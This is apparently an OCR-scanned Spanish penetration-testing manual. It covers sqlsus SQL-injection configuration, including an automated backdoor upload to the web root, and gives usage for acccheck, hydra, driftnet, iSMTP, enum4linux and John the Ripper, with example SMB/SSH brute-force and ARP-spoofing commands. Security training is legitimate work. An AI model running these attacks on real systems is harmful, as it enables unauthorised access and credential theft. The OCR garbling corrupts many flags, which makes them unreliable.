# The first "1" will be used as the injeetion spot 

# 

# Note that aetual valúes will be used (0 or 1) (exeept the 1 replaced as the injeetion spot) in the 
UNION select query, which might not be what you want 

# You can change the entries (but the " I" you want to use) to whatever valué suits you 

# Unless this variable is set, sqlsus will auto-detect the suitable number of columns to be used for 
injeetion 

our @columns = qw(); 

# How to unión 

our $union_select = "UNION ALE SELECT BINARY"; 

############################### 

######### BLIND MODE ########## 

# ASCII chars to brute forcé if no regex matched 

our $default_range = join (9,10,32..126)); 

# Regular expressions to test against each Item retrieved on a blind injeetion 

# and the corresponding ASCII valúes 

# NOTE; 

# - the valúes MUST be sorted 

# - the regexs will be tried in order 
our @regex_rhke = ( 

# num 

"^[0-9]+\$",jom (',',(48..57)), 

# lower alpha 

"^[a-z_. @]+\$", join (',',(32,46,64,95,97..122)), 

# lower hex 

"^[a-fí)-9]+\$",jom (',',(48..57,97..102)), 

# upper hex 

"^[A-E0-9]+\$", join (',',(48..57,65..70)), 

# upper alpha 

"^[A-Z_. @]+\$", join (',',(32,46,64,65..90,95)), 

# mixed alpha 

"^[A-Za-z_. @]+\$", join (',',(32,46,64,65..90,95,97.. 122)), 

# alnum 



"^[a-z0-9._@]+\$",join (',',(46,48..57,64,95,97..122)), 

# datetime 

"^[0-9 [.hyphen-minus.];]+\$", join (',',(32,45,48..57,58)), 

# mixed alnum + stuíf 

"^[A-Za-z0-9._@+/ [.hyphen-minus.][.apostrophe.][.quotation-mark.]%]+\$", join (',', 
(32,34,37,39,43,45,46,47,48..57,64,65..90,95,97..122)) 

); 

# Máximum length above which an item won't be bruteforeed 

# Set it high enough if you intend to download fdes 
our $blind_max_length = 4096; 

############################### 

########## TAKEOVER ########### 

# Doeument root, on the web server, of the website we are injeeting through 

# This MUSI be aeeurate for sqlsus to be able to upload its backdoor by automatieally crawling for 
eandidate direetories 

# Also, the web and mysql server must obviously be on the same box 
our $dooument_root = "/var/www/"; 

# Eist of (relativo to doeument root path) directorios to try to upload backdoor to 

# Eeave empty for auto detection by crawling the web server 

# ex : our @upload_directories = ("/upload"); 
our @upload_directories = (); 

# Máximum depth to look at when crawling the web server for directorios 
our $crawler_depth = 5; 

# URL of the uploader script, if already uploaded 
our Suploader = ""; 

# What remoto filename to use when uploading the tiny uploader 
our $uploader_name = ".u.php"; 

# URL of the backdoor, if already uploaded 
our Sbackdoor = ""; 

# What remoto filename to use when uploading the backdoor 
our $backdoor_name = ".b.php"; 

############################### 

########### BRUTE mmmmmm# 

# Dynamic string to use for column/table ñames bruteforcing 

# It will be "magically" (perl speaking) incremented and prefix with $table_prefix when applicable 
our $brute_start_string = "aaa"; 

# String to begin the table/column ñame with 

# ex : our $start_string = "cms_"; 
our $table_prefix = ""; 

# Eor each table ñame, also try an uppercase versión for the first char only 
our $uc_first = 1; 

# Eor each table ñame, also try an uppercase versión (for all chars) 
our $uc_all = 0; 

# Tables dictionnary 

our @brute_tables_dict = qw(login logins user users group groups perm permissions perms admin 
admins administrators staff customer customers client clients config configuration member 
members ñame ñames password passwords); 

# Columns dictionnary 

our @brute_columns_dict = qw(id admin login ñame user usemame email emailaddress mail 
e_mail tel phone number telephone address adress Street pw pwd pass password); 

Descripción del fichero de configuración 



Consta de las partes siguientes 

1) general. 

Primero debemos espeeifiear la URL a ataear eon $url_start = "http://looalhost/soript.php?id=r"; 
Cuando sea posible, generalmente es una buena idea usar "#" al final de esta linea para que las 
eonsultas no se eontaminen eon el original, por ejemplo, $url_end = 

Si se quiere usar POST en vez de GET, eseribiremos $post = 0; 

El parámetro $blind espeeifiea el tipo de inyeeeión, 0 ninguna, 1 boolean-based blind injeetion y 2 
time-based blind injeetion. En el modo boolean-based blind, la eadena que se encuentra en el 
HTML si la declaración es verdadera, establecer el parámetro $ blind_string = "" 

En el modo time-based blind, se tiene que establecer cuanto tiempo en segundos para sleep() 
cuando la afirmación es verdadera. Se debe especificar un valor superior al retraso máximo que se 
espera en condiciones normales, por ejemplo $ blind sleep = 2; 

Para permitir que los valores especificados en el archivo de configuración sean anulados por los que 
ha configurado en sqlsus, especificar $ allow override = 1; 

Agente de usuario a utilizar para consultas HTTP, 

$ user agent = "Mozilla / 4.0 (compatible; MSIE 7.0; Windows NT 6.0)"; 

Mostrar los mensajes de depuración con el parámetro $debug =0 sin visualización 
nuestra $ depuración = 0; 

Cadenas de codificación hexadecimal en la consulta, es decir: sqlsus se enviará como 
0x73716c737573, evitando asi el filtrado de comillas y para esto $ hex_encode_strings = 1; 

Máximo de procesos en ejecución utilizados para recuperar datos 
Sprocesses =10; 

Cantidad de segundos a esperar después de cada ataque $ sleep after hit = 0; 

Cantidad máxima de datos que se pueden enviar a la vez. Por lo general, está restringido por el 
tamaño de la URL del servidor web o por la capa debajo (PHP/suhosin). Solo se puede establecer 
una de las 2 variables a la vez y será la única que será utilizada por sqlsus. Si ambas se establecen 
en 0, sqlsus encontrará que restricción se aplica y establecerá las variables en consecuencia. 
Cantidad máxima de datos que podemos enviar de una vez al objetivo (+ el tamaño de la URL en si) 
$ max url length = 0; 

Cantidad máxima de datos que podemos enviar a través del punto de inyección 
$ max inj length = 0; 

Max subqueries per query con $max_subqueries = 70; 

Convertir especies a 1**1 con $convert_spaces = 0; 

Establecer cookies con $use_cookiejar = 1; 

Para establecer las cookies, sus sintaxis es que cada nombre consta de un par de valores separados 
por; 

Con la variable $proxy = se establece si hay proxy o no 

A continuación se pueden establecer las credenciales con las variables $cred_realm = 

$cred_user = ""; y $cred_password = ""; 

2) data 

Esablecer la longitud máxima antes de que los datos devueltos en el HTME se trunquen con 
$max_returned_length = 65530; 

Ea ruta donde guardar los datos $datapath = "/root/.sqlsus"; 

Eos nombres de los ficheros descargados $filespath = "files"; 

Uso del modo binario $binary = 0; 


3) indband mode 



En este modo generalmente es una buena idea agregar "AND 0" para que la consulta real no 
devuelva nada. 

Número máximo de columnas que se utilizarán en la declaración UNION, 
our $ max select cols = 50; 

Columnas utilizables para esta inyección usando unión, opr ejemplo, @columnas = qw (0 0 1 0 1); 
Esto significa que se usarán 5 columnas para la unión, y la tercera y la quinta se pueden usar para 
ver el resultado de la consulta. El primer "1" se usará como punto de inyección 
Teñera en cuenta que los valores reales que se utilizarán son 0 o 1, Excepto el 1 reemplazado como 
el punto de inyección en la consulta de selección UNION, se pueden cambiar las entradas a 
cualquier valor que convenga. A menos que se establezca esta variable, sqlsus detectará 
automáticamente la cantidad adecuada de columnas que se utilizarán para la inyección 
@columnas = qw (); 

Especificar la UNION concepto $union_select = "UNION AEE SEEECT BINARY"; 

4) blind mode 

Especificar los caracteres ASCII para la fuerza bruta sin no hay coincidencia de la expresión regular 
regex, por ejemplo, $default_range = join (9,10,32..126)); 

Eongitud máxima por encima del cual no se aplicará la fuerza bruta 
$ blind max length = 4096; 

5) takeover 

Raíz del documento, en el servidor web, del sitio web que estamos inyectando. Esto debe ser 
preciso para que sqlsus pueda cargar su puerta trasera rastreando automáticamente los directorios 
candidatos. Además, el servidor web y mysql obviamente debe estar en la misma caja 
$ document_root = "/ var / www /"; 

# Eista de directorios relativos a la ruta raíz del documento para intentar cargar la puerta trasera. 
Dejarlo en blanco para la detección automática rastreando el servidor web 
@upload_directories = (); 

Profundidad máxima a tener en cuenta al rastrear el servidor web en busca de directorios 
crawlerdepth = 5; 

URE de la secuencia de comandos del cargador, si ya está cargado $ cargador = 

Nombre del archivo remoto usar al subir el pequeño cargador $ uploader name = ".u.php"; 

URE de la puerta trasera, si ya está cargada $ backdoor = 

Nombre del archivo remoto a usar al subir la puerta trasera $ backdoor_name = ".b.php"; 

6) brute 

Cadena dinámica a usar para los nombres de columnas/tablas de fuerza bruta. Se incrementará 
"mágicamente" y el prefijo con $ table_prefix cuando corresponda 
$ brute_start_string = "aaa"; 

Cadena para comenzar el nombre de la tabla/columna con $ start string = "cms_"; y 
$ table_prefix = ""; 

Para cada nombre de tabla, probar también una versión en mayúscula solo para el primer carácter 
$ uc_first = 1; 

Para cada nombre de tabla, probar también una versión en mayúscula para todos los caracteres 
$ uc_all = 0; 

# Tablas de diccionarios 

@brute_columns_dict = qw (id admin nombre de inicio de sesión nombre de usuario nombre de 
usuario correo electrónico correo electrónico dirección de correo electrónico correo electrónico 
número de teléfono dirección de teléfono dirección calle pw contraseña de contraseña pwd); 


Una vez establecidos todos sus parámetros, ejecutar 
sqlsus fichero.cfg 



si fichero.cfg es el nombre del fichero de eonfiguraeión. 



72. VARIOS 


acccheck 

Es una herramienta muy seneilla pero potente y debido a que utiliza ataques 
por dieeionario via el protoeolo SMB 

ace-voip 

Los ataques se llevarán a eabo en eontra de los usuarios en funeión de su 
nombre, en lugar de eentrarse en el tráfieo de VoIP 

drifnet 

Esta herramienta deteeta y muestra los arehivos grábeos que pasan por el red 

enum41inux 

Herramienta para enumerar la informaeión de los sistemas Windows y Samba. 

foremost 

Es un programa de eonsola para reeuperar arehivos basándose en sus 
cabeceras, pies de página y las estructuras de datos internas. 

hydra 

Hacer pruebas de cuentas de usuario 

ismtp 

Prueba la enumeración de usuarios SMTP 

john the ripper 

Combina varios modos de craqueo en un programa y es totalmente 
configurable para sus necesidades particulares. 

mimikatz 

Extrae de la memoria contraseñas, hash, código PIN y tickets kerberos de 
textos planos. 

miranda 

Es una aplicación cliente Universal Plug-N-Play 

oscanner 

Es un marco de evaluación de Oracle desarrollado en Java. 

OSRF Framework 

Muy bueno. Busca nombres en gmail y otros correos eléctronicos 

peepdf 

Es una herramienta para el análisis forensic de documentos pdf. 

responder 

Responde a consultas especificas NBT-NS (NetBIOS Ñame Service) 

smtp-user-enum 

Es una herramienta para enumerar las cuentas de usuario a nivel de sistema 
operativo en Solaris via el servicio SMTP. 

theharvester 

Es una herramienta que nos proporciona información sobre cuentas de correo 
electrónico, nombres de usuario y nombres de host/subdominios de diferentes 
fuentes públicas 

u3-pwn 

Herramienta diseñada para automatizar la inyección de payloads de 

Metasploit en dispositivos USB de Sandisk 




73. acccheck 


Fue creado por Faisal Dean y está escrito en Perl. Es una herramienta muy sencilla pero potente y 
debido a que utiliza ataques por diccionario via el protocolo SMB, solo puede emplearse contra 
dispositivos con sistema operativo Windows. Realmente solo se necesita conocer cual es la red que 
se va a atacar (192.168.1.0/24, 192.168.10.0/24) y tener listos los 3 diccionarios que se utilizan para 
atacar a todos los equipos que se necesitan; el diccionario de posibles contraseñas, el diccionario de 
posibles usuarios y un diccionario de direcciones IR Si se conoce la dirección IR del equipo a atacar, 
no hace falta el diccionario correspondiente, lo mismo sucede con las el nombre de usuario y la 
contraseña. 

Intenta conectarse a los recursos compartidos de IPC$ y ADMIN$ dependiendo de los indicadores 
que se hayan elegido e intenta una combinación de nombres de usuario y contraseñas con la 
esperanza de identificar la contraseña en una cuenta dada a través de un ataque de adivinación de 
contraseña del diccionario. 

Uso; acccheck [opciones] 

Opciones 


-t 

Permite atacar una única dirección IP 

-T 

Permite atacar a múltiples direcciones IP que están contenidos 
en un fichero 

-P 

Permite probar una única contraseña 

-P 

Permite probar múltiples contraseñasque están contenidas en un 
fichero 

-u 

Permite probar con un solo nombre de usuario 

-U 

Permite probar con múltiples usuarios que están contenidos en 
un fichero 

-V 

Activa el modo verbose 


Los resultados se graban en un fichero cracked en formato de texto plano. 

Ejemplos; 

1. Averiguar la contraseña del usuario Administrador del equipo cuya dirección IR es la 
192.168.1.3; 

acccheck-t 192.168.1.3 -u Administrador-P Vroot/Escritorio/diccionario contraseñas’ 

2. Averiguar el nombre de todos los usuarios, sus respectivas contraseñas y cuales son sus 
direcciones IP; 

acccheck -T Vroot/Escritorio/listado_ips’ -U Vroot/Escritorio/diccionario_usuarios’ -P 
Vroot/Escritorio/diccionariocontraseñas’ 

3. Averiguar la cuenta de administrator si su contraseña es en blanco 

acccheck -t 10.10.10.1 

4. Averiguar todas las contraseñas del fichero password.txt contra la cuenta de administrador. 

acccheck-t 10.10.10.1 -Ppassword.txt 




5. Averiguar todas las contraseñas del fichero password.txt contra todos los usuarios del 
ficchero users.txt 

acccehck -t 10.10.10.1 -U users.txt -Ppassword.txt 

6. Averiguar una única contraseña de un único usuario 

acccheck -t 10.10.10.1 -u administrator -p password 



74. ace-voip 


Los ataques se llevarán a cabo en contra de los usuarios en función de su nombre. En lugar de 
centrarse en el tráfico de VoIP, se centra en los flujos RTP de audio o direcciones IP El programa 
trabaja usando DHCP, TETP y HTTP para descargar el directorio de VoIP corporativo. 

Se puede utilizar de 2 maneras. En primer lugar, se puede detectar automáticamente el servidor 
TETP dirección IP mediante DHCP y segundo, el usuario puede especificar la dirección IP del 
servidor TETP como un parámetro de línea de comandos de la herramienta. En cualquier caso, debe 
proporcionar la dirección MAC del teléfono IP con la opción -m para que la herramienta descargue 
correctamente el archivo de configuración a través de TETP 


Uso: 

ace [-i interface] [-m mac address] [-t servidor tftp dirección ip |-c modo cdp |-v voz vían id 
|-r interfaz vían |-d modo verbose] 


-i <interface> 

Obligatorio 

Interfaz para escaneo/envío de paquetes 

-m <mac address> 

Obligatorio 

Dirección MAC del teléfono IP víctima 

-t <tftp server ip> 

Opcional 

Dirección IP del servidor TETP 

-c <cdp mode 0 1 > 

Opcional 

0 modo CDP sniffmg, 1 modo CDP spoof 

-V <voice vían id> 

Opcional 

Introducir la ID de VEAN de voz 

-r <vlan interface> 

Opcional 

Elimina la interfaz VEAN 

-d 

Opcional 

Modo verbose 


Ejemplos: 

1 .Modo de descubrir automáticamente IP del servidor TETP a través de DHCP 
ace -i ethO -m 00:lE:P7:28:9C:8e 

2. Modo para especificar la dirección IP del servidor TETP 
ace -i ethO -t 192.168.10.150 -m 00:lE:P7:28:9C:8e 

3. Modo para especificar el ID de VEAN de voz 
ace -i ethO -v 96 -m 00:IE:P7:28:9C:8E 

4. Modo verbose 

ace -i ethO -v 96 -m 00:IE:P7:28:9C:8E -d 

5. Modo a eliminar vían interfaz 
ace -r ethO.96 

6. Modo para autodescubrir ID VEAN de voz en el modo sniífing para CDP 
ace -i ethO -c 0 -m 00:1E:P7:28:9C:8E 

7. Modo para autodescubrir ID VEAN de voz en el modo spoofing para CDP 
ace -i ethO -c 1 -m 00:1E:P7:28:9C:8E 




75. driftnet 


driftnet es una herramienta diseñada para probar la seguridad de la red. Lo que haee esta 
herramienta es detectar y mostrar archivos gráficos que pasan por el red y para ello, debe identificar 
los paquetes que contienen los binarios para una parte de un archivo gráfico, 

Luego se combinan los binarios de los paquetes y se muestran. 

Drifnet, nos permite observar las imágenes de un trafico TCP. 

Uso; driftnet [opciones] [código de filtro] 

Opciones: 


-h 

Mostrar este mensaje de ayuda 

-V 

Modo verbose 

-b 

Sonar cuando se captura una nueva imagen 

-i interface 

Seleccionar la interfaz en la que desea escuchar. Valor predeterminado: 
todas las interfaces 

-ffile 

En lugar de escuchar en una interfaz, leer los paquetes capturados desde 
un archivo de volcado pcap. El archivo se puede haber obtenido con 
otras herramientas como Kismet o similar. 

-P 

No poner la interfaz de escucha en modo promiscuo 

-a 

Modo Adjunct: no mostrar las imágenes en la pantalla, sino guardarlas 
en un directorio temporal y anunciar sus nombres en la salida estándar. 

-m number 

Número máximo de imágenes a guardar en el directorio temporal en 
modo adjunto. 

-d directory 

Usar el directorio temporal nombrado 

-X prefix 

Prefijo a usar al guardar imágenes 

-s 

Intentar extraer los datos de audio transmitidos desde la red, además de 
las imágenes. Actualmente esto solo admite datos MPEG 

-S 

Extraer audio transmitido pero no imágenes. 

-M command 

Usar el comando dado para reproducir datos de audio MPEG extraidos 
con la opción -s. Esto deberia procesar los paquetes MPEG 
suministrados en la entrada estándar. Valor predeterminado; 'mpgl23 -' 


El modo adjunto está diseñado para ser utilizado por otros programas que deseen usar driftnet para 
recopilar imágenes de la red. Con la opción -m, driftnet obtendrá las imágenes en silencio y las 
guardadrá hasta la cantidad especificada en su directorio temporal. Se supone que algún otro 
proceso está recolectando y eliminando los archivos de imagen. 

Empleo 

La máquina donde se ejecuta driftnet, debe funcionar como MiTM, es decir, interceptar el tráfico de 
la red. Se recomienda hacr ARP spoofing y esto se puede hacer con el programa ethercap. Asi para 
realizar el ataque, tan solo se tiene que indicar a ethercap los objetivos, por ejemplo, un dispositivo 
(192.168.1.55) y el emulador (192.168.1.1). Una vez arrancado ethercap, elegir la interfaz por la 
cual se va a capturar el tráfico. 




Una vez iniciado el ataque dejar ethercap con el terminal abierto y en otro terminal, se ejecuta 
driftnet con driftnet -i wlanO 

En ese mismo momento se pueden ver en una pequeña pantalla todas las imágenes que este 
viendo nuestra victima que no viajen por un canal cifrado (https) 



76. enum4linux 


enum41inux es una herramienta para enumerar la informaeión de los sistemas Windows y Samba. 
Ofrecer una funcionalidad similar a enum.exe 

Uso; enum41inux.pl [opciones] ip 

Opciones 


-u 

Obtener la lista de usuarios 

-M 

Obtener la lista de máquinas 

-S 

Obtener la lista de distribución 

-P 

Obtener la información de la política de contraseña 

-G 

Obtener el grupo y la lista de miembros 

-d 

Modo detallado 

-u user 

Especificar el nombre de usuario a usar. Por defecto "" 

-p pass 

Especificar la contraseña a usar. Por defecto "" 


Otra s opciones 


-a 

Hacer toda la enumeración simple (-U -S -G -P -r -o -n -n -i). Esta opción 
está habilitada si no proporciona ninguna otra opción. 

-h 

Mostrar la ayuda y salir 

-r 

Enumerar los usuarios a través del ciclo RID 

-R range 

Rangos de RID a enumerar. Valor predeterminado; 500-550,1000-1050, 
implica -r 

-Kn 

Seguir buscando RIDs hasta que n RID consecutivos no correspondan a un 
nombre de usuario. El rango de Imples RID termina en 999999. 

-1 

Obtener alguna información limitada a través de EDAP 389 / TCP. 

Solo para DC 

-s fde 

Euerza bruta 

-k user 

Usuario(s) que existe en el sistema remoto. Predeterminado; administrador, 
guest, krbtgt, administradores de dominio, root, bin, none. Se usa para 
obtener el sid con "lookupsid known usemame". Usar comas para probar 
varios usuarios; "-k admin, userl, user2" 

-0 

Obtener la información del sistema operativo 

-i 

Obtener la información de la impresora 

-w wrkg 

Especificar el grupo de trabajo manualmente 

-n 

Hacer un nmblookup. Similar a nbtstat 

-V 

Modo verbose 


Ejemplo 

enum41inux -U -o 192.168.1.200 





77. Foremost 


Foremost es un programa de consola para recuperar archivos basándose en sus cabeceras, pies de 
página y las estructuras de datos internas. 

Es un programa muy eficiente que escanea rápidamente a través de imágenes de disco y reconstruye 
los archivos, utilizando una lista de encabezados y pies de página conocidas. Esto hace que sea 
posible recuperar el contenido de los archivos, incluso después de que la información del directorio, 
a menudo como consecuencia del formateo del disco. Eos nombres de archivo no se pueden 
recuperar mediante esta técnica, pero si se puede recuperar el contenido del archivo. Es muy fácil de 
usar y ante todo simplemente invocando sin ninguna opción busca todos los posibles tipos de 
archivo y coloca los archivos que encuentre en una carpeta llamada “output”. 

Uso: foremost [-v|-V|-h|-T|-Q|-q|-a|-w-d] [-t <type>] [-s <blocks>] [-k <size>] [-b <size>] 

[-C <fde>] [-0 <dir>] [-1 <file] 


-V 

Mostrar la versión y salir 

-t 

Especificar el tipo de archivo, (-t jpeg, pdf...) 

-d 

Activar la detección de bloques indirectos para los sistemas de archivos UNIX 

-i 

Especificar el archivo de entrada. El valor predeterminado es stdin 

-a 

Escribir todos los encabezados y no realizar detección de errores 

-w 

Sólo escribir el archivo de auditoría y no escribir ningún archivo detectado en 
el disco 

-0 

Configurar el directorio de salida. Por defecto output 

-c 

Configurar el archivo de configuración a usar. Por defecto foremost.conf 

-q 

Habilitar el modo rápido. Ea búsqueda se realiza en los límites de 512 octetos. 

-Q 

Habilitar el modo silencioso. Suprimir los mensajes de salida. 

-V 

Modo verbose 


Ejemplo 

foremost -t all -i filename -o output file -v 




78. hydra 


Hydra es una excelente aplicación para poder hacer pruebas de cuentas de usuario por SSH bajo 
fuerz bruta, en conjunto con ataque de diccionario a puertos que acepten SSH. Hydra es un cracker 
de inicio de sesión que en su ataque admite numerosos protocolos.. Nuevos módulos son fáciles de 
agregar, además de eso, es flexible y muy rápido. Esta herramienta ofrece a los investigadores y 
consultores de seguridad la posibilidad de mostrar lo fácil que sería obtener acceso no autorizado 
desde un control remoto a un sistema. 

En la actualidad soporta AEP, Cisco AAA, Cisco auth. Cisco enable, CVS, Eirebird, ETP, ETPS, 
HTTP-EORM-GET, HTTP-EORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTP- 
PROXY-URLENUM, ICQ, IMAP, IRC, EDAP2, EDAP3, MS-SQE, MYSQE, NCP, NNTP, 
Oracle, Oracle-Eistener, Oracle-SID, PC-Anywhere, PCNES, POP3, POSTGRES, RDP, REXEC, 
RLOGIN, RSH, SAP/R3, SIP, SMB, SMTP, SMTP-Enum, SNMP, SOCKS5, SSHl, SSH2, 
SSHKEY, Subversión, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP 
Para la mayoría de los protocolos, el modo SSE está disponible. 

Uso: hydra 

[[[-1 EOGINI-E EIEE] [-p PASS|-P PIEE|-x OPT]] | [-C PILE]] [-e nsr] 

[-u] [-f] [-P] [-M PILE] [-0 PILE] [-t TASKS] [-w TIME] [-W TIME] 

[-S PORT] [-S] [-4/6] [-vV] [-d] 

server Service [OPTIONAL SERVICE PARAMETER] 

Apuntar a un objetivo para atacar, puede ser una dirección IPv4, una dirección IPv6 o un nombre 
DNS. 

Ejecutar "hydra -U <servicename>" para obtener ayuda sobre las opciones de un servicio. 


Opciones 


_R 

Restaurar una sesión cancelada anteriormente. Requiere que se haya 
escrito un archivo hydra.restore. No se permiten otras opciones cuando se 
usa -R 

-S 

Conectarse via SSL 

-s PORT 

Establecer el puerto del servicio 

-1 LOGIN 

Iniciar sesión con un nombre 

-P PILE 

Iniciar sesión desde un flchero 

-X min:max:charset 

Generar contraseñas de longitud mínima a máxima. Juego de caracteres 
que puede contener 1 para números, a para minúsculas y A para 
mayúsculas. Ejemplo: 1: 2: al%. 

Las contraseñas generadas serán de longitud 1 a 2 y contendrán 
letras minúsculas, números y / o signos de porcentaje y puntos. 

-e nsr 

Veriflcaciones adicionales, "n" para contraseña nula, "s" intentar iniciar 
sesión, "r" intentar el inicio de sesión inverso 

-C PILE 

Pormato de "inicio de sesión: pasar" separado por dos puntos, en lugar de 
las opciones -L / -P 

-u 

De forma predeterminada, Hydra veriflca todas las contraseñas para un 
inicio de sesión y luego intenta el siguiente inicio de sesión. Esta opción 
recorre las contraseñas, por lo que la primera contraseña se prueba en 





todos los inieios de sesión, luego la siguiente contraseña. 

-f 

Salir después del primer par de inicio de sesión /contraseña eneontrado 

-E 

Salir después del primer par de inicio de sesión / eontraseña encontrado 
para cualquier dispositivo 

-M EIEE 

Eista de servidores para ataques paralelos, una entrada por linea 

-0 EIEE 

Eseribir los pares de inicio de sesión / contraseña encontrados en EIEE en 
lugar de stdout 

-t TASKS 

Ejecutar TASKS número de conexiones en paralelo. Predeterminado: 16 

-w TIME 

Define el tiempo de espera máximo en segundos para las respuestas 
Predeterminado: 32 

-W TIME 

Define un tiempo de espera entre eada eonexión que realiza una tarea. 

Esto generalmente solo tiene sentido si se usa un número de tarea bajo, 
por ejemplo, -t 1 

-4/-6 

Usar direcciones IPv4 (predeterminada) o IPv6 

-v/-V 

Modo verbose 

-h, —help 

Mostrar las opeiones 


En caso de que se requiera atacar el puerto SSH en otro puerto se utilizará -s seguido del puerto 
#hydra -s 22 -1 root -P /usr/password.txt 192.168.1.14 -t 4 ssh 

Ejemplo 1 

# hydra -1 root -p admin 192.168.1.14 -t 4 ssh 

El parametro -1 indiea que habrá solo un usuario para el test. El parámetro -p indiea que se utilizará 
una eontraseña para la prueba , el parámetro -t indica el número de subproeesos que utilizará la 
herramienta donde se recomienda 4 y la ultima parte es que se atacara un SSH 

Ejemplo 2 

Usando una lista de palabras 

# hydra -1 root -P /ubicacion/deEarehivo.txt 192.168.1.14 -t 4 ssh 

En este caso el parámetro P es mayúscula, y hace alusión a un listado de password para atacar el 
objetivo. 

Para haeerlo más rápido se puede utilizar cruneh 
#erunch 4 4 012345abcdef -o Documentos / pass.txt 

con este comando podemos generar un doeumento con varios password con las letras que apreeen 
alli. 

Ejemplo 3 

Para la lista de usuarios también se tiene la posibilidad de utilizar un listado y en este caso se usará 
el parámetro -E 

# hydra -E /listado/de/Usuarios.txt -P /listado/de/password.txt 192.168.1.14 -t 4 ssh 
Con el parámetro -M se puede añadir un listado de vietimas en formato de IP, 




79. ¡SMTP 


Este programa prueba la enumeraeión de usuarios SMTP (RCPT TO y VRFY), la suplantaeión 
interna y el relay. 

Uso; iSMTP.py <opoiones> 

Obli gatorias: __ 


-f <import file> 

Importar una lista de servidores SMTP para la prueba. 

-h <host> 

Ea dirección IP y el puerto del dispositivo a atacar 


Solo se puede usar una opeión de ambas. 
Suplantación: 


-i <isa email> 

Especificar la dirección de correo electrónico de ISA. 

-s <sndr email> 

Especificar la dirección de correo electrónico del remitente. 

-r <rcpt email> 

Especificar la dirección de correo electrónico del destinatario. 

—sr <email> 

Especificar la dirección de correo electrónico del remitente y 
del destinatario. 

-S <sndr name> 

Especificar el nombre y apellido del remitente. 

-R <rcpt name> 

Especificar el nombre y apellido del destinatario. 

—SR <name> 

Especificar el nombre y apellido del remitente y del 
destinatario. 

-m 

Habilitar la prueba de simulación de SMTP. 

-a 

Incluir el archivo adjunto .txt con correo electrónico 
falsificado. 


Enumeración SMTP; 


-e <file> 

Habilitar las pruebas de enumeración de usuarios SMTP e importar la 
lista de correo electrónico. 

-1<1|2|3> 

Especificar el tipo de enumeración (1 = VREY, 2 = RCPT TO, 3 = 
todos). El valor predeterminado es 3. 


Relay SMTP: 


-i <isa email> 

Especificar la dirección de correo electrónico de ISA. 

-X 

Habilitar la prueba de relay externo SMTP. 


Varios: 


-t <secs> 

El valor del tiempo de espera. El valor predeterminado es 10. 

-0 

Crear el directorio "ismtp-results" y escribir la salida en 
ismtp-results/smtp_<service>_<ip>(puerto).txt 








Ejemplo 

ismtp -f smtp-ips.txt -e /usr/share/wordlists/metasploit/unix_users.txt 


iSMTP vi.6 - SMTP Server Tester, Alton Johnson (alton.jx(a)gmail.com) 


Testing SMTP server [user enumeration]: 192.168.1.25:25 
Emails provided for testing: 109 
Performing SMTP VRFY test... 

[-] 4Dgifts-[ invalid ] 

[-] EZsetup-[ invalid ] 

[+] ROOT-[ success ] 

[+] adm-[ success ] 








80. John the Ripper 


John the Ripper es rápido y tiene muchas caracteristicas importantes en cuanto al descifrado de 
contraseñas. Combina varios modos de craqueo en un programa y es totalmente configurable para 
sus necesidades. Además John the Ripper está disponible para varias plataformas diferentes, lo que 
le permite usar el mismo cracker en todas partes. 

John the Ripper admite y detecta automáticamente los siguientes tipos: 

• hash crypt(3) de Unix: basado en DES tradicional, 

• bigcrypt, BSDI basado en DES extendido, 

• EreeBSD basado en MD5 y 

• OpenBSD basado rn Blowfish. 

También se admiten los hashes Kerberos/AES y Windows EM basados en DES, asi como tripcodes 
basados en DES. 

Cuando se ejecuta en distribuciones de Einux con glibc 2.7+, también soporta y detecta 
automáticamente hashes SHA-crypt(3), con paralelización opcional OpenMR De manera similar, 
cuando se ejecuta en versiones recientes de Solaris, admite y detecta automáticamente los hashes 
SHA-crypt y SunMD5, también con paralelización OpenMP opcional. 

Eas versiones mejoradas agregan soporte para muchos más tipos de hash de contraseña, incluyendo 
Windows NTLM basado en MD4, hash SHA-1 de Mac OS X 10.4, hash SHA-512 con Mac OS X 
10.7, hashó en bruto de MD5 y SHA-1, tipos de hash de contraseñas de aplicaciones web arbitrarias 
basadas en MD5, hashes utilizados por los servidores de bases de datos SQE (MySQL, MS SQE, 
Oracle) y por algunos servidores EDAP, varios tipos de hash utilizados en OpenVMS, hashes de 
contraseñas del robot IRC de Eggdrop y muchos otros tipos de hash, asi como muchos hashes como 
OpenSSH, claves S/Key skeykeys, Kerberos TGT, PDE, ZIP (PKZIP clásico y WinZip / AES) y 
archivos RAR. 

A diferencia de los crackers más antiguos, normalmente John the Ripper usa una rutina de estilo 
crypt. En su lugar, tiene sus propios módulos altamente optimizados para diferentes tipos de hash y 
arquitecturas de procesador. Algunos de los algoritmos utilizados, como bitslice DES, no podrian 
haberse implementado dentro de la API crypt(3). Además hay rutinas de lenguaje ensamblador para 
varias arquitecturas de procesadores, la más importante para x86-64 y x86 con SSE2. 

John the Ripper admite los siguientes 4 modos de descifrado de contraseñas: 

• Modo de lista de palabras: en este modo, solo se debe proporcionar el archivo con la lista de 
palabras y el archivo de contraseñas para ser descifrado. Este archivo es de texto plano y 
contiene una lista de palabras y de posibles contraseñas. Sólo hay una palabra en cada linea. 

• Modo de crack único: este modo ha sido sugerido por el autor de John the Ripper y este 
modo, el programa utilizará los nombres de inicio de sesión, campo de nombre y directorio 
de inicio del usuario como candidatos de contraseña. El resultado es mucho más rápido que 
el modo de lista de palabras. 

• Modo incremental: en este modo, el programa probará todos los caracteres posibles como 
combinaciones en el nombre y la contraseña. Aunque es el descifrado más potente, si no 
establece la condición de terminación, el proceso tomará un tiempo largo. Eos modos 
predefinidos son: All, Alnum, Alpha, Dígitos y Eanman, o se puede definir uno propio. 

• Modo externo: en este modo, se puede utilizar el modo de descifrado externo a ser utilizado 
por el programa. Se necesita crear una sección de archivo de configuración llamada 
[Eist.External: MODE], donde MODE es el nombre que se asigna. 



Uso; john [opciones] [PASSWORD-FILES] 


Opciones 


—config=FILE 

Usar EILE en lugar de john.conf ojohn.ini para la configuración 

-single[=SECTION] 

Modo solo crack 

—wordlist[=EIEE] 

—stdin wordlist mode 

Eeer palabras de EIEE o stdin 

-pipe 

Como -stdin pero lee masivamente y permite reglas 

—loopback[=EILE] 

Como —wordlist, pero recupera palabras de un archivo .pot 

—dupe-suppression 

Suprimir todos los duplicados en la lista de palabras 

—encoding=NAME 

Eos datos de entrada no son ASCII 

—list=encodings 

Eista de codificaciones 

-rules[=SECTION] 

